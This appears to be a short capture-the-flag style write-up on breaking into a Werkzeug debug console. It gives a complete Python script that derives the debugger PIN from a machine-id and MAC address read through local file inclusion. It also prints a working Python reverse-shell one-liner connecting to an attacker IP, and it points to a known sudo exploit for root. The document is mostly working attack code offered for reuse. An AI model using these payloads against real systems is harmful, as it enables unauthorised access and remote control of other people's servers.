Jun 17, 2024 2 min read lfi

Werkzeug httpd login bypass via lfi and py + reverse shell + root

found a py file online that can grant you password to access Werkzeug if you got machine id + address

Python file

import hashlib from itertools import chain probably_public_bits = [ 'aas',# username 'flask.app',# modname 'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__')) '/usr/local/lib/python2.7/dist-packages/flask/app.pyc' # getattr(mod, '__file__', None), ] private_bits = [ '345052364024',# str(uuid.getnode()), /sys/class/net/ens33/address '258f132cd7e647caaf5510e3aca997c1'# get_machine_id(), /etc/machine-id ] h = hashlib.md5() for bit in chain(probably_public_bits, private_bits): if not bit: continue if isinstance(bit, str): bit = bit.encode('utf-8') h.update(bit) h.update(b'cookiesalt') #h.update(b'shittysalt') cookie_name = '__wzd' + h.hexdigest()[:20] num = None if num is None: h.update(b'pinsalt') num = ('%09d' % int(h.hexdigest(), 16))[:9] rv =None if rv is None: for group_size in 5, 4, 3: if len(num) % group_size == 0: rv = '-'.join(num[x:x + group_size].rjust(group_size, '0') for x in range(0, len(num), group_size)) break else: rv = num print(rv)

Reading the machine id + address thru our lfi

and we gaint login, executing commands failed but i success reverse shell with py as well!

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

Reverse command ive used

Next i checked sudo version seems too old and well know exploit avilable

Sudo v1.8.21p1 Exploit